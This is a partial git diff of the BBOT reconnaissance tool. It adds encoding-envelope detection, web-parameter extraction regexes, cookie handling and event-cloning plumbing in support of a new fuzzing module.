diff --git a/README.md b/README.md index ee5790ee5d..b979a1b6ee 100644 --- a/README.md +++ b/README.md @@ -383,6 +383,7 @@ For details, see [Configuration](https://www.blacklanternsecurity.com/bbot/Stabl - [List of Modules](https://www.blacklanternsecurity.com/bbot/Stable/modules/list_of_modules) - [Nuclei](https://www.blacklanternsecurity.com/bbot/Stable/modules/nuclei) - [Custom YARA Rules](https://www.blacklanternsecurity.com/bbot/Stable/modules/custom_yara_rules) + - [Lightfuzz](https://www.blacklanternsecurity.com/bbot/Stable/modules/lightfuzz) - **Misc** - [Contribution](https://www.blacklanternsecurity.com/bbot/Stable/contribution) - [Release History](https://www.blacklanternsecurity.com/bbot/Stable/release_history) diff --git a/bbot/core/event/base.py b/bbot/core/event/base.py index f669c65ff7..3c22364d29 100644 --- a/bbot/core/event/base.py +++ b/bbot/core/event/base.py @@ -9,9 +9,9 @@ import ipaddress import traceback -from copy import copy from pathlib import Path from typing import Optional +from copy import copy, deepcopy from contextlib import suppress from radixtarget import RadixTarget from pydantic import BaseModel, field_validator @@ -40,6 +40,7 @@ validators, get_file_extension, ) +from bbot.core.helpers.web.envelopes import BaseEnvelope log = logging.getLogger("bbot.core.event") @@ -589,6 +590,10 @@ def parent(self, parent): elif not self._dummy: log.warning(f"Tried to set invalid parent on {self}: (got: {parent})") + @property + def children(self): + return [] + @property def parent_id(self): parent_id = getattr(self.get_parent(), "id", None) @@ -643,6 +648,13 @@ def get_parents(self, omit=False, include_self=False): e = parent return parents + def clone(self): + # Create a shallow copy of the event first + cloned_event = copy(self) + # Re-assign a new UUID + cloned_event._uuid = uuid.uuid4() + return cloned_event + def _host(self): return "" @@ -824,7 +836,13 @@ def json(self, mode="json", siem_friendly=False): j["discovery_path"] = 
self.discovery_path j["parent_chain"] = self.parent_chain + # parameter envelopes + parameter_envelopes = getattr(self, "envelopes", None) + if parameter_envelopes is not None: + j["envelopes"] = parameter_envelopes.to_dict() + # normalize non-primitive python objects + for k, v in list(j.items()): if k == "data": continue @@ -1307,12 +1325,56 @@ class URL_HINT(URL_UNVERIFIED): class WEB_PARAMETER(DictHostEvent): + @property + def children(self): + # if we have any subparams, raise a new WEB_PARAMETER for each one + children = [] + envelopes = getattr(self, "envelopes", None) + if envelopes is not None: + subparams = sorted(list(self.envelopes.get_subparams())) + + if envelopes.selected_subparam is None: + current_subparam = subparams[0] + envelopes.selected_subparam = current_subparam[0] + if len(subparams) > 1: + for subparam, _ in subparams[1:]: + clone = self.clone() + clone.envelopes = deepcopy(envelopes) + clone.envelopes.selected_subparam = subparam + clone.parent = self + children.append(clone) + return children + + def sanitize_data(self, data): + original_value = data.get("original_value", None) + if original_value is not None: + try: + envelopes = BaseEnvelope.detect(original_value) + setattr(self, "envelopes", envelopes) + except ValueError as e: + log.verbose(f"Error detecting envelopes for {self}: {e}") + return data + def _data_id(self): # dedupe by url:name:param_type url = self.data.get("url", "") name = self.data.get("name", "") param_type = self.data.get("type", "") - return f"{url}:{name}:{param_type}" + envelopes = getattr(self, "envelopes", "") + subparam = getattr(envelopes, "selected_subparam", "") + + return f"{url}:{name}:{param_type}:{subparam}" + + def _outgoing_dedup_hash(self, event): + return hash( + ( + str(event.host), + event.data["url"], + event.data.get("name", ""), + event.data.get("type", ""), + event.data.get("envelopes", ""), + ) + ) def _url(self): return self.data["url"] @@ -1730,7 +1792,6 @@ def make_event( data = 
net.network_address event_class = globals().get(event_type, DefaultEvent) - return event_class( data, event_type=event_type, @@ -1790,7 +1851,6 @@ def event_from_json(j, siem_friendly=False): resolved_hosts = j.get("resolved_hosts", []) event._resolved_hosts = set(resolved_hosts) - event.timestamp = datetime.datetime.fromisoformat(j["timestamp"]) event.scope_distance = j["scope_distance"] parent_id = j.get("parent", None) diff --git a/bbot/core/helpers/diff.py b/bbot/core/helpers/diff.py index ea7ca3a864..73f3adef12 100644 --- a/bbot/core/helpers/diff.py +++ b/bbot/core/helpers/diff.py @@ -15,22 +15,24 @@ def __init__( parent_helper, method="GET", data=None, + json=None, allow_redirects=False, include_cache_buster=True, headers=None, cookies=None, - timeout=15, + timeout=10, ): self.parent_helper = parent_helper self.baseline_url = baseline_url self.include_cache_buster = include_cache_buster self.method = method self.data = data + self.json = json self.allow_redirects = allow_redirects self._baselined = False self.headers = headers self.cookies = cookies - self.timeout = 15 + self.timeout = 10 @staticmethod def merge_dictionaries(headers1, headers2): @@ -53,6 +55,7 @@ async def _baseline(self): follow_redirects=self.allow_redirects, method=self.method, data=self.data, + json=self.json, headers=self.headers, cookies=self.cookies, retries=2, @@ -76,6 +79,7 @@ async def _baseline(self): follow_redirects=self.allow_redirects, method=self.method, data=self.data, + json=self.json, retries=2, timeout=self.timeout, ) @@ -103,11 +107,9 @@ async def _baseline(self): for k in ddiff.keys(): for x in list(ddiff[k]): - log.debug(f"Added {k} filter for path: {x.path()}") self.ddiff_filters.append(x.path()) self.baseline_json = baseline_1_json - self.baseline_ignore_headers = [ h.lower() for h in [ @@ -158,7 +160,6 @@ def compare_body(self, content_1, content_2): if len(ddiff.keys()) == 0: return True else: - log.debug(ddiff) return False async def compare( @@ -169,6 +170,7 @@ 
async def compare( check_reflection=False, method="GET", data=None, + json=None, allow_redirects=False, timeout=None, ): @@ -199,6 +201,7 @@ async def compare( follow_redirects=allow_redirects, method=method, data=data, + json=json, timeout=timeout, ) diff --git a/bbot/core/helpers/helper.py b/bbot/core/helpers/helper.py index 78ccf67155..a953746807 100644 --- a/bbot/core/helpers/helper.py +++ b/bbot/core/helpers/helper.py @@ -129,7 +129,8 @@ def http_compare( cookies=None, method="GET", data=None, - timeout=15, + json=None, + timeout=10, ): return HttpCompare( url, @@ -141,6 +142,7 @@ def http_compare( timeout=timeout, method=method, data=data, + json=json, ) def temp_filename(self, extension=None): diff --git a/bbot/core/helpers/misc.py b/bbot/core/helpers/misc.py index 92c9e523fd..688f9f599c 100644 --- a/bbot/core/helpers/misc.py +++ b/bbot/core/helpers/misc.py @@ -2,13 +2,16 @@ import sys import copy import json +import math import random import string import asyncio import logging import ipaddress +import ahocorasick import regex as re import subprocess as sp + from pathlib import Path from contextlib import suppress from unidecode import unidecode # noqa F401 @@ -797,17 +800,14 @@ def recursive_decode(data, max_depth=5): return data -rand_pool = string.ascii_lowercase -rand_pool_digits = rand_pool + string.digits - - -def rand_string(length=10, digits=True): +def rand_string(length=10, digits=True, numeric_only=False): """ Generates a random string of specified length. Args: length (int, optional): The length of the random string. Defaults to 10. digits (bool, optional): Whether to include digits in the string. Defaults to True. + numeric_only (bool, optional): Whether to generate a numeric-only string. Defaults to False. Returns: str: A random string of the specified length. 
@@ -819,11 +819,17 @@ def rand_string(length=10, digits=True): 'ap4rsdtg5iw7ey7y3oa5' >>> rand_string(30, digits=False) 'xdmyxtglqfzqktngkesyulwbfrihva' + >>> rand_string(15, numeric_only=True) + '934857349857395' """ - pool = rand_pool - if digits: - pool = rand_pool_digits - return "".join([random.choice(pool) for _ in range(int(length))]) + if numeric_only: + pool = string.digits + elif digits: + pool = string.ascii_lowercase + string.digits + else: + pool = string.ascii_lowercase + + return "".join(random.choice(pool) for _ in range(length)) def truncate_string(s, n): @@ -921,6 +927,7 @@ def extract_params_xml(xml_data, compare_mode="getparam"): "getparam": {chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="}, "postparam": {chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="}, "cookie": {chr(c) for c in range(33, 127) if chr(c) not in '()<>@,;:"/[]?={} \t'}, + "bodyjson": set(chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="), } @@ -2772,6 +2779,35 @@ def clean_dict(d, *key_names, fuzzy=False, exclude_keys=None, _prev_key=None): return d +def string_scan(substrings, text, case_insensitive=True): + automaton = ahocorasick.Automaton() + if case_insensitive: + substrings = [s.lower() for s in substrings] + text = text.lower() + for idx, substring in enumerate(substrings): + automaton.add_word(substring, (idx, substring)) + automaton.make_automaton() + found_substrings = [] + for end_index, (insert_order, original_value) in automaton.iter(text): + found_substrings.append(original_value) + return found_substrings + + +def calculate_entropy(data): + """Calculate the Shannon entropy of a byte sequence""" + if not data: + return 0 + frequency = {} + for byte in data: + if byte in frequency: + frequency[byte] += 1 + else: + frequency[byte] = 1 + data_len = len(data) + entropy = -sum((count / data_len) * math.log2(count / data_len) for count in frequency.values()) + return entropy + + top_ports_cache = None @@ -2825,3 
+2861,15 @@ def clean_requirement(req_string): dist = distribution("bbot") return [clean_requirement(r) for r in dist.requires] + + +def is_printable(s): + """ + Check if a string is printable + """ + if not isinstance(s, str): + raise ValueError(f"Expected a string, got {type(s)}") + + # Exclude control characters that break display/printing + s = set(s) + return all(ord(c) >= 32 or c in "\t\n\r" for c in s) diff --git a/bbot/core/helpers/regexes.py b/bbot/core/helpers/regexes.py index adf8abb650..8e162a3262 100644 --- a/bbot/core/helpers/regexes.py +++ b/bbot/core/helpers/regexes.py @@ -111,25 +111,55 @@ # For use with excavate parameters extractor input_tag_regex = re.compile( - r"]+?name=[\"\']?([\.$\w]+)[\"\']?(?:[^>]*?value=[\"\']([=+\/\w]*)[\"\'])?[^>]*>" + r"]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?\svalue=[\"\']?([:%\-\._=+\/\w]*)[\"\']?[^>]*?>" ) -jquery_get_regex = re.compile(r"url:\s?[\"\'].+?\?(\w+)=") -jquery_post_regex = re.compile(r"\$.post\([\'\"].+[\'\"].+\{(.+)\}") +input_tag_regex2 = re.compile( + r"]*?\svalue=[\"\']?([:\-%\._=+\/\w]*)[\"\']?[^>]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?>" +) +input_tag_novalue_regex = re.compile(r"]*\bvalue=)[^>]*?name=[\"\']?([\-\._=+\/\w]*)[\"\']?[^>]*?>") +input_tag_novalue_regex = re.compile(r"]*\b\svalue=)[^>]*?\sname=[\"\']?([\-\._=+\/\w]*)[\"\']?[^>]*?>") +# jquery_get_regex = re.compile(r"url:\s?[\"\'].+?\?(\w+)=") +# jquery_get_regex = re.compile(r"\$.get\([\'\"].+[\'\"].+\{(.+)\}") +# jquery_post_regex = re.compile(r"\$.post\([\'\"].+[\'\"].+\{(.+)\}") a_tag_regex = re.compile(r"]*href=[\"\']([^\"\'?>]*)\?([^&\"\'=]+)=([^&\"\'=]+)") img_tag_regex = re.compile(r"]*src=[\"\']([^\"\'?>]*)\?([^&\"\'=]+)=([^&\"\'=]+)") get_form_regex = re.compile( - r"]+(?:action=[\"']?([^\s\'\"]+)[\"\']?)?[^>]*method=[\"']?[gG][eE][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + r"]*\bmethod=[\"']?[gG][eE][tT][\"']?[^>]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +get_form_regex2 = 
re.compile( + r"]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*\bmethod=[\"']?[gG][eE][tT][\"']?[^>]*>([\s\S]*?)<\/form>", re.DOTALL, ) post_form_regex = re.compile( - r"]+(?:action=[\"']?([^\s\'\"]+)[\"\']?)?[^>]*method=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + r"]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +post_form_regex2 = re.compile( + r"]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +post_form_regex_noaction = re.compile( + r"]*(?:\baction=[\"']?([^\s\"'<>]+)[\"']?)?[^>]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", re.DOTALL, ) +generic_form_regex = re.compile( + r"]*\bmethod=)[^>]+(?:\baction=[\"']?([^\s\"'<>]+)[\"']?)[^>]*>([\s\S]*?)<\/form>", re.IGNORECASE | re.DOTALL +) + select_tag_regex = re.compile( - r"]+?name=[\"\']?(\w+)[\"\']?[^>]*>(?:\s*]*?value=[\"\'](\w*)[\"\']?[^>]*>)?" + r"]+?name=[\"\']?([_\-\.\w]+)[\"\']?[^>]*>(?:\s*]*?value=[\"\']?([_\.\-\w]*)[\"\']?[^>]*>)?", re.IGNORECASE | re.DOTALL ) + textarea_tag_regex = re.compile( - r']*\bname=["\']?(\w+)["\']?[^>]*>(.*?)', re.IGNORECASE | re.DOTALL + r']*\bname=["\']?([_\-\.\w]+)["\']?[^>]*>(.*?)', re.IGNORECASE | re.DOTALL +) + +button_tag_regex = re.compile( + r"]*?name=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?value=[\"\']?([%\-\._=+\/\w]*)[\"\']?[^>]*?>" +) +button_tag_regex2 = re.compile( + r"]*?value=[\"\']?([\-%\._=+\/\w]*)[\"\']?[^>]*?name=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?>" ) tag_attribute_regex = re.compile(r"<[^>]*(?:href|action|src)\s*=\s*[\"\']?(?!mailto:)([^\s\'\"\>]+)[\"\']?[^>]*>") diff --git a/bbot/core/helpers/url.py b/bbot/core/helpers/url.py index 5482e54c51..91c7d8a01b 100644 --- a/bbot/core/helpers/url.py +++ b/bbot/core/helpers/url.py @@ -32,7 +32,10 @@ def parse_url(url): return urlparse(url) -def add_get_params(url, params): +def add_get_params(url, params, encode=True): + def _no_encode_quote(s, 
safe="/", encoding=None, errors=None): + return s + """ Add or update query parameters to the given URL. @@ -53,10 +56,23 @@ def add_get_params(url, params): >>> add_get_params('https://www.evilcorp.com?foo=1', {'foo': 2}) ParseResult(scheme='https', netloc='www.evilcorp.com', path='', params='', query='foo=2', fragment='') """ - parsed = parse_url(url) - old_params = dict(parse_qs(parsed.query)) - old_params.update(params) - return parsed._replace(query=urlencode(old_params, doseq=True)) + parsed = urlparse(url) + query_params = parsed.query.split("&") + + existing_params = {} + for param in query_params: + if "=" in param: + k, v = param.split("=", 1) + existing_params[k] = v + + existing_params.update(params) + + if encode: + new_query = urlencode(existing_params, doseq=True) + else: + new_query = urlencode(existing_params, doseq=True, quote_via=_no_encode_quote) + + return parsed._replace(query=new_query) def get_get_params(url): diff --git a/bbot/core/helpers/web/client.py b/bbot/core/helpers/web/client.py index 28788e04d9..49ddf532be 100644 --- a/bbot/core/helpers/web/client.py +++ b/bbot/core/helpers/web/client.py @@ -63,11 +63,18 @@ def __init__(self, *args, **kwargs): headers = kwargs.get("headers", None) if headers is None: headers = {} + + # cookies + cookies = kwargs.get("cookies", None) + if cookies is None: + cookies = {} + # user agent user_agent = self._web_config.get("user_agent", "BBOT") if "User-Agent" not in headers: headers["User-Agent"] = user_agent kwargs["headers"] = headers + kwargs["cookies"] = cookies # proxy proxies = self._web_config.get("http_proxy", None) kwargs["proxies"] = proxies @@ -78,10 +85,23 @@ def __init__(self, *args, **kwargs): self._cookies = DummyCookies() def build_request(self, *args, **kwargs): - request = super().build_request(*args, **kwargs) - # add custom headers if the URL is in-scope - # TODO: re-enable this - if self._target.in_scope(str(request.url)): + if args: + url = args[0] + kwargs["url"] = url + url = 
kwargs["url"] + + target_in_scope = self._target.in_scope(str(url)) + + if target_in_scope: + if not kwargs.get("cookies", None): + kwargs["cookies"] = {} + for ck, cv in self._web_config.get("http_cookies", {}).items(): + if ck not in kwargs["cookies"]: + kwargs["cookies"][ck] = cv + + request = super().build_request(**kwargs) + + if target_in_scope: for hk, hv in self._web_config.get("http_headers", {}).items(): # don't clobber headers if hk not in request.headers: diff --git a/bbot/core/helpers/web/engine.py b/bbot/core/helpers/web/engine.py index 4401a219fd..8ffdbe966f 100644 --- a/bbot/core/helpers/web/engine.py +++ b/bbot/core/helpers/web/engine.py @@ -8,7 +8,7 @@ from contextlib import asynccontextmanager from bbot.core.engine import EngineServer -from bbot.core.helpers.misc import bytes_to_human, human_to_bytes, get_exception_chain +from bbot.core.helpers.misc import bytes_to_human, human_to_bytes, get_exception_chain, truncate_string log = logging.getLogger("bbot.core.helpers.web.engine") @@ -203,6 +203,14 @@ async def _acatch(self, url, raise_error): else: log.trace(f"Error with request to URL: {url}: {e}") log.trace(traceback.format_exc()) + except httpx.InvalidURL as e: + if raise_error: + raise + else: + log.warning( + f"Invalid URL (possibly due to dangerous redirect) on request to : {url}: {truncate_string(e, 200)}" + ) + log.trace(traceback.format_exc()) except ssl.SSLError as e: msg = f"SSL error with request to URL: {url}: {e}" if raise_error: diff --git a/bbot/core/helpers/web/envelopes.py b/bbot/core/helpers/web/envelopes.py new file mode 100644 index 0000000000..c000c5d1c0 --- /dev/null +++ b/bbot/core/helpers/web/envelopes.py @@ -0,0 +1,348 @@ +import json +import base64 +import binascii +import xmltodict +from contextlib import suppress +from urllib.parse import unquote, quote +from xml.parsers.expat import ExpatError + +from bbot.core.helpers.misc import is_printable + + +# TODO: This logic is perfect for extracting params. 
We should expand it outwards to include other higher-level envelopes: +# - QueryStringEnvelope +# - MultipartFormEnvelope +# - HeaderEnvelope +# - CookieEnvelope +# +# Once we start ingesting HTTP_REQUEST events, this will make them instantly fuzzable + + +class EnvelopeChildTracker(type): + """ + Keeps track of all the child envelope classes + """ + + children = [] + + def __new__(mcs, name, bases, class_dict): + # Create the class + cls = super().__new__(mcs, name, bases, class_dict) + # Don't register the base class itself + if bases and not name.startswith("Base"): # Only register if it has base classes (i.e., is a child) + EnvelopeChildTracker.children.append(cls) + EnvelopeChildTracker.children.sort(key=lambda x: x.priority) + return cls + + +class BaseEnvelope(metaclass=EnvelopeChildTracker): + __slots__ = ["subparams", "selected_subparam", "singleton"] + + # determines the order of the envelope detection + priority = 5 + # whether the envelope is the final format, e.g. raw text/binary + end_format = False + ignore_exceptions = (Exception,) + envelope_classes = EnvelopeChildTracker.children + # transparent envelopes (i.e. 
TextEnvelope) are not counted as envelopes or included in the finding descriptions + transparent = False + + def __init__(self, s): + unpacked_data = self.unpack(s) + + if self.end_format: + inner_envelope = unpacked_data + else: + inner_envelope = self.detect(unpacked_data) + + self.selected_subparam = None + # if we have subparams, our inner envelope will be a dictionary + if isinstance(inner_envelope, dict): + self.subparams = inner_envelope + self.singleton = False + # otherwise if we just have one value, we make a dictionary with a default key + else: + self.subparams = {"__default__": inner_envelope} + self.singleton = True + + @property + def final_envelope(self): + try: + return self.unpacked_data(recursive=False).final_envelope + except AttributeError: + return self + + @property + def friendly_name(self): + if self.friendly_name: + return self.friendly_name + else: + return self.name + + def pack(self, data=None): + if data is None: + data = self.unpacked_data(recursive=False) + with suppress(AttributeError): + data = data.pack() + return self._pack(data) + + def unpack(self, s): + return self._unpack(s) + + def _pack(self, s): + """ + Encodes the string using the class's unique encoder (adds the outer envelope) + """ + raise NotImplementedError("Envelope.pack() must be implemented") + + def _unpack(self, s): + """ + Decodes the string using the class's unique encoder (removes the outer envelope) + """ + raise NotImplementedError("Envelope.unpack() must be implemented") + + def unpacked_data(self, recursive=True): + try: + unpacked = self.subparams["__default__"] + if recursive: + with suppress(AttributeError): + return unpacked.unpacked_data(recursive=recursive) + return unpacked + except KeyError: + return self.subparams + + @classmethod + def detect(cls, s): + """ + Detects the type of envelope used to encode the packed_data + """ + if not isinstance(s, str): + raise ValueError(f"Invalid data passed to detect(): {s} ({type(s)})") + # if the value is 
empty, we just return the text envelope + if not s.strip(): + return TextEnvelope(s) + for envelope_class in cls.envelope_classes: + with suppress(*envelope_class.ignore_exceptions): + envelope = envelope_class(s) + if envelope is not False: + return envelope + del envelope + raise Exception(f"No envelope detected for data: '{s}' ({type(s)})") + + def get_subparams(self, key=None, data=None, recursive=True): + if data is None: + data = self.unpacked_data(recursive=recursive) + if key is None: + key = [] + + if isinstance(data, dict): + for k, v in data.items(): + full_key = key + [k] + if isinstance(v, dict): + yield from self.get_subparams(full_key, v) + else: + yield full_key, v + else: + yield [], data + + def get_subparam(self, key=None, recursive=True): + if key is None: + key = self.selected_subparam + envelope = self + if recursive: + envelope = self.final_envelope + data = envelope.unpacked_data(recursive=False) + if key is None: + if envelope.singleton: + key = [] + else: + raise ValueError("No subparam selected") + else: + for segment in key: + data = data[segment] + return data + + def set_subparam(self, key=None, value=None, recursive=True): + envelope = self + if recursive: + envelope = self.final_envelope + + # if there's only one value to set, we can just set it directly + if envelope.singleton: + envelope.subparams["__default__"] = value + return + + # if key isn't specified, use the selected subparam + if key is None: + key = self.selected_subparam + if key is None: + raise ValueError(f"{self} -> {envelope}: No subparam selected") + + data = envelope.unpacked_data(recursive=False) + for segment in key[:-1]: + data = data[segment] + data[key[-1]] = value + + @property + def name(self): + return self.__class__.__name__ + + @property + def num_envelopes(self): + num_envelopes = 0 if self.transparent else 1 + if self.end_format: + return num_envelopes + for envelope in self.subparams.values(): + with suppress(AttributeError): + num_envelopes += 
envelope.num_envelopes + return num_envelopes + + @property + def summary(self): + if self.transparent: + return "" + self_string = f"{self.friendly_name}" + with suppress(AttributeError): + child_envelope = self.unpacked_data(recursive=False) + child_summary = child_envelope.summary + if child_summary: + self_string += f" -> {child_summary}" + + if self.selected_subparam: + self_string += f" [{'.'.join(self.selected_subparam)}]" + return self_string + + def to_dict(self): + return self.summary + + def __str__(self): + return self.summary + + __repr__ = __str__ + + +class HexEnvelope(BaseEnvelope): + """ + Hexadecimal encoding + """ + + friendly_name = "Hexadecimal-Encoded" + + ignore_exceptions = (ValueError, UnicodeDecodeError) + + def _pack(self, s): + return s.encode().hex() + + def _unpack(self, s): + return bytes.fromhex(s).decode() + + +class B64Envelope(BaseEnvelope): + """ + Base64 encoding + """ + + friendly_name = "Base64-Encoded" + + ignore_exceptions = (binascii.Error, UnicodeDecodeError, ValueError) + + def unpack(self, s): + # it's easy to have a small value that accidentally decodes to base64 + if len(s) < 8 and not s.endswith("="): + raise ValueError("Data is too small to be sure") + return super().unpack(s) + + def _pack(self, s): + return base64.b64encode(s.encode()).decode() + + def _unpack(self, s): + return base64.b64decode(s).decode() + + +class URLEnvelope(BaseEnvelope): + """ + URL encoding + """ + + friendly_name = "URL-Encoded" + + def unpack(self, s): + unpacked = super().unpack(s) + if unpacked == s: + raise Exception("Data is not URL-encoded") + return unpacked + + def _pack(self, s): + return quote(s) + + def _unpack(self, s): + return unquote(s) + + +class TextEnvelope(BaseEnvelope): + """ + Text encoding + """ + + end_format = True + # lowest priority means text is the ultimate fallback + priority = 10 + transparent = True + ignore_exceptions = () + + def _pack(self, s): + return s + + def _unpack(self, s): + if not is_printable(s): 
+ raise ValueError(f"Non-printable data detected in TextEnvelope: '{s}' ({type(s)})") + return s + + +# class BinaryEnvelope(BaseEnvelope): +# """ +# Binary encoding +# """ +# end_format = True + +# def pack(self, s): +# return s + +# def unpack(self, s): +# if is_printable(s): +# raise Exception("Non-binary data detected in BinaryEnvelope") +# return s + + +class JSONEnvelope(BaseEnvelope): + """ + JSON encoding + """ + + friendly_name = "JSON-formatted" + end_format = True + priority = 8 + ignore_exceptions = (json.JSONDecodeError,) + + def _pack(self, s): + return json.dumps(s) + + def _unpack(self, s): + return json.loads(s) + + +class XMLEnvelope(BaseEnvelope): + """ + XML encoding + """ + + friendly_name = "XML-formatted" + end_format = True + priority = 9 + ignore_exceptions = (ExpatError,) + + def _pack(self, s): + return xmltodict.unparse(s) + + def _unpack(self, s): + return xmltodict.parse(s) diff --git a/bbot/core/helpers/web/web.py b/bbot/core/helpers/web/web.py index 6c712e1e3e..273a6da93d 100644 --- a/bbot/core/helpers/web/web.py +++ b/bbot/core/helpers/web/web.py @@ -332,6 +332,7 @@ async def curl(self, *args, **kwargs): curl_command.append("-k") headers = kwargs.get("headers", {}) + cookies = kwargs.get("cookies", {}) ignore_bbot_global_settings = kwargs.get("ignore_bbot_global_settings", False) @@ -344,10 +345,17 @@ async def curl(self, *args, **kwargs): if "User-Agent" not in headers: headers["User-Agent"] = user_agent - # only add custom headers if the URL is in-scope + # only add custom headers / cookies if the URL is in-scope if self.parent_helper.preset.in_scope(url): for hk, hv in self.web_config.get("http_headers", {}).items(): - headers[hk] = hv + # Only add the header if it doesn't already exist in the headers dictionary + if hk not in headers: + headers[hk] = hv + + for ck, cv in self.web_config.get("http_cookies", {}).items(): + # don't clobber cookies + if ck not in cookies: + cookies[ck] = cv # add the timeout if "timeout" not in 
kwargs: diff --git a/bbot/core/modules.py b/bbot/core/modules.py index c83d34a96f..d5599fa498 100644 --- a/bbot/core/modules.py +++ b/bbot/core/modules.py @@ -104,8 +104,9 @@ def add_module_dir(self, module_dir): def file_filter(self, file): file = file.resolve() - if "templates" in file.parts: - return False + for part in file.parts: + if part.endswith("_submodules") or part == "templates": + return False return file.suffix.lower() == ".py" and file.stem not in ["base", "__init__"] def preload(self, module_dirs=None): diff --git a/bbot/modules/base.py b/bbot/modules/base.py index 48d190f29b..2362983897 100644 --- a/bbot/modules/base.py +++ b/bbot/modules/base.py @@ -528,8 +528,9 @@ async def emit_event(self, *args, **kwargs): if v is not None: emit_kwargs[o] = v event = self.make_event(*args, **event_kwargs) - if event: - await self.queue_outgoing_event(event, **emit_kwargs) + children = event.children + for e in [event] + children: + await self.queue_outgoing_event(e, **emit_kwargs) return event async def _events_waiting(self, batch_size=None): diff --git a/bbot/modules/httpx.py b/bbot/modules/httpx.py index 8edc4e1d69..21fa48d63d 100644 --- a/bbot/modules/httpx.py +++ b/bbot/modules/httpx.py @@ -3,6 +3,8 @@ import tempfile import subprocess from pathlib import Path +from http.cookies import SimpleCookie + from bbot.modules.base import BaseModule @@ -137,8 +139,20 @@ async def handle_batch(self, *events): if self.probe_all_ips: command += ["-probe-all-ips"] + # Add custom HTTP headers for hk, hv in self.scan.custom_http_headers.items(): command += ["-header", f"{hk}: {hv}"] + + # Add custom HTTP cookies as a single header + if self.scan.custom_http_cookies: + cookie = SimpleCookie() + for ck, cv in self.scan.custom_http_cookies.items(): + cookie[ck] = cv + + # Build the cookie header + cookie_header = f"Cookie: {cookie.output(header='', sep='; ').strip()}" + command += ["-header", cookie_header] + proxy = self.scan.http_proxy if proxy: command += ["-http-proxy", 
proxy] diff --git a/bbot/modules/hunt.py b/bbot/modules/hunt.py index 649eaaa19b..a46bd58c39 100644 --- a/bbot/modules/hunt.py +++ b/bbot/modules/hunt.py @@ -284,11 +284,29 @@ class hunt(BaseModule): async def handle_event(self, event): p = event.data["name"] + matching_categories = [] + + # Collect all matching categories for k in hunt_param_dict.keys(): if p.lower() in hunt_param_dict[k]: - description = f"Found potential {k.upper()} parameter [{p}]" - data = {"host": str(event.host), "description": description} - url = event.data.get("url", "") - if url: - data["url"] = url - await self.emit_event(data, "FINDING", event) + matching_categories.append(k) + + if matching_categories: + # Create a comma-separated string of categories + category_str = ", ".join(matching_categories) + description = f"Found potentially interesting parameter. Name: [{p}] Parameter Type: [{event.data['type']}] Categories: [{category_str}]" + + if ( + "original_value" in event.data.keys() + and event.data["original_value"] != "" + and event.data["original_value"] is not None + ): + description += ( + f" Original Value: [{self.helpers.truncate_string(str(event.data['original_value']), 200)}]" + ) + + data = {"host": str(event.host), "description": description} + url = event.data.get("url", "") + if url: + data["url"] = url + await self.emit_event(data, "FINDING", event) diff --git a/bbot/modules/internal/excavate.py b/bbot/modules/internal/excavate.py index 5fb0fee245..f7a6e3cc66 100644 --- a/bbot/modules/internal/excavate.py +++ b/bbot/modules/internal/excavate.py @@ -300,7 +300,7 @@ class excavateTestRule(ExcavateRule): } options = { - "retain_querystring": False, + "retain_querystring": True, "yara_max_match_data": 2000, "custom_yara_rules": "", } @@ -314,7 +314,9 @@ class excavateTestRule(ExcavateRule): _module_threads = 8 - parameter_blacklist = { + parameter_blacklist_prefix = ["TS01", "BIGipServerpool_"] # Big-IP F5 Persistence Cookies + + parameter_blacklist = set( p.lower() for p 
in [ "__VIEWSTATE", @@ -328,14 +330,25 @@ class excavateTestRule(ExcavateRule): "ASP.NET_SessionId", "JSESSIONID", "PHPSESSID", + "AWSALB", + "AWSALBCORS", ] - } + ) yara_rule_name_regex = re.compile(r"rule\s(\w+)\s{") yara_rule_regex = re.compile(r"(?s)((?:rule\s+\w+\s*{[^{}]*(?:{[^{}]*}[^{}]*)*[^{}]*(?:/\S*?}[^/]*?/)*)*})") def in_bl(self, value): - return value.lower() in self.parameter_blacklist + lower_value = value.lower() + + if lower_value in self.parameter_blacklist: + return True + + for bl_param_prefix in self.parameter_blacklist_prefix: + if lower_value.startswith(bl_param_prefix.lower()): + return True + + return False def url_unparse(self, param_type, parsed_url): if param_type == "GETPARAM": @@ -391,7 +404,7 @@ def extract(self): yield ( self.output_type, parameter_name, - original_value, + original_value.strip(), action, _exclude_key(extracted_parameters_dict, parameter_name), ) @@ -404,7 +417,7 @@ class PostJquery(GetJquery): class HtmlTags(ParameterExtractorRule): name = "HTML Tags" - discovery_regex = r'/<[^>]+(href|src)=["\'][^"\']*["\'][^>]*>/ nocase' + discovery_regex = r'/<[^>]+(href|src|action)=["\']?[^"\'>\s]*["\']?[^>]*>/ nocase' extraction_regex = bbot_regexes.tag_attribute_regex output_type = "GETPARAM" @@ -412,48 +425,119 @@ def extract(self): urls = self.extraction_regex.findall(str(self.result)) for url in urls: parsed_url = urlparse(url) - query_strings = parse_qs(parsed_url.query) - query_strings_dict = { - k: v[0] if isinstance(v, list) and len(v) == 1 else v for k, v in query_strings.items() - } + query_strings = parse_qs(html.unescape(parsed_url.query)) + query_strings_dict = {k: v[0] if isinstance(v, list) else v for k, v in query_strings.items()} for parameter_name, original_value in query_strings_dict.items(): yield ( self.output_type, parameter_name, - original_value, + original_value.strip(), url, _exclude_key(query_strings_dict, parameter_name), ) + class AjaxJquery(ParameterExtractorRule): + name = 